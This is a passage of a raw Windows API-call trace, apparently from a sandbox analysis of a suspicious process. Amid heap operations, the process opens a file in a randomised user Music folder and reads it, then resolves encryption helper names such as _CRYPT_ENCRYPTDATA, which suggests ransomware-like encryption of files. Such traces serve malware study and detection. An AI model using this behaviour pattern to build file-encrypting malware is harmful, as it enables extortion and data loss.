hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0182.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0182.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0182.644] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz")) returned 0x10 [0182.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0182.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0182.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0182.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0182.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\7ihrod3g.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0182.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0182.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0182.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0182.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0182.648] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0182.648] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0182.648] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0182.649] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0182.649] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa854, lpOverlapped=0x0) returned 1 [0182.652] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0182.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa854) returned 0xbea018 [0182.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0183.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0183.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0183.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0183.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0183.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0183.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa854) returned 0xbf4878 [0183.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0183.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0183.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0183.813] TranslateMessage (lpMsg=0x87f36c) returned 0 [0183.813] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0183.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0183.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0183.813] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0183.815] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0183.815] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0183.815] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0183.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0183.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0183.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0183.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0183.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0183.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa854) returned 0xbea018 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0183.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0183.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0183.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0183.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0183.816] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0183.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0183.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0183.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa854) returned 0xbea018 [0183.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0183.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0183.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0183.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0183.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa854) returned 0xbff0d8 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0183.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0183.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0183.819] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0183.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0183.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0183.819] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0183.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0183.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0183.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0183.820] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0183.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0183.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0183.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0183.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0183.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0183.821] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0183.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0183.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0183.822] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 